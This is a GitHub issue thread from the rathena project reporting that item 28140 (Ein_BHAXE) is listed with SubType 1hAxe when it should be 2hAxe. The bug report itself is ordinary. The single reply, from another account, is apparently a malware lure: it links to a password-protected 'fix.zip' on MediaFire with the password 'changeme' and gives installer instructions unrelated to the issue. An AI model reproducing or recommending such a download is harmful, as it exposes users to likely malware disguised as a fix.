### ISSUE TITLE
28140 Ein_BHAXE SubType?

### ISSUE THREAD

**Issue by gmragnarok** [rathena/rathena#8601]
### rAthena Hash

c5eaa15

### Client Date

2022-04-06

### Server Mode

Renewal

### Result

on item_db_equip RE

https://raw.githubusercontent.com/rathena/rathena/master/db/re/item_db_equip.yml

the SubType: 1hAxe

this is must be 2hAxe based on divine pride https://www.divine-pride.net/database/item/28140

### Expected Result

SubType: 2hAxe

this is must be 2hAxe based on divine pride https://www.divine-pride.net/database/item/28140

### How to Reproduce

check https://raw.githubusercontent.com/rathena/rathena/master/db/re/item_db_equip.yml

### Official Information

https://www.divine-pride.net/database/item/28140

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
